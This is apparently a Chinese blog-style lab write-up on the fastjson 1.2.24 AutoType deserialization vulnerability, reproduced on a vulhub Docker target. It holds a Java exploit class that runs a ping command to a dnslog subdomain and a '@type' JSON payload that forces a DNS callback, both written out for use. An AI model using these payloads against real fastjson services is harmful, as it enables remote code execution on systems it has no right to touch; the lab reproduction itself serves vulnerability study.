文章目录
1.啥是JSON介绍:
JSON,全称:JavaScript Object Notation,作为一个常见的轻量级的数据交换格式,应该在一个程序员的开发生涯中是常接触的。简洁和清晰的层次结构使得 JSON 成为理想的数据交换语言。 易于人阅读和编写,同时也易于机器解析和生成,并有效地提升网络传输效率。
即JavaScript对象标记法,使用键值对进行信息的存储。举个简单的例子如下:
{
"name":"hang",
"age":19,
"media":["CSDN","bilibili","Github"]
}
json本质就是一种字符串,用于信息的存储和交换。
2.啥是fastjson?
fastjson 是一个 有阿里开发的一个开源Java 类库,可以将 Java 对象转换为 JSON 格式(序列化),当然它也可以将 JSON 字符串转换为 Java 对象(反序列化)。
3.fastjson序列化/反序列化原理
fastjson的漏洞本质还是一个java的反序列化漏洞,由于引进了AutoType功能,fastjson在对json字符串反序列化的时候,会读取到@type的内容,将json内容反序列化为java对象并调用这个类的setter方法。
4.fastjson反序列化漏洞原理
使用AutoType功能进行序列号的JSON字符会带有一个@type来标记其字符的原始类型,在反序列化的时候会读取这个@type,来试图把JSON内容反序列化到对象,并且会调用这个库的setter或者getter方法,然而,@type的类有可能被恶意构造,只需要合理构造一个JSON,使用@type指定一个想要的攻击类库就可以实现攻击。
$复现流程:
漏洞影响范围:fastjson<=1.2.24
下面仅作漏洞复现记录与实现,利用流程如下:
一、漏洞环境搭建
本文漏洞环境采用vulhub搭建,执行以下命令开启环境
cd /vulhub/fastjson/1.2.24-rce/
docker-compose up -d
执行完毕后访问8090端口,访问如下:
二、漏洞验证方法一
首先将exp进行编译,将以下内容保存为TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"ping", "test.3ztjrz.dnslog.cn"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
三、漏洞验证方法二
先用dnslog外带方式验证一下漏洞存不存在
dnslog地址
DNSLog PlatformDNSLog平台 http://www.dnslog.cn/
修改数据包
请求方式GET改成POST
加上Content-Type:application/json 请求头字段
加请求体数据,内容如下
{
"a":{
"@type":"java.net.Inet4Address",
"val":"申请的域名"
}
}
再刷新dnslog页面,查看有无变化
发现有记录了,能收到靶场发来的内容,说明存漏洞
关闭靶场docker stop id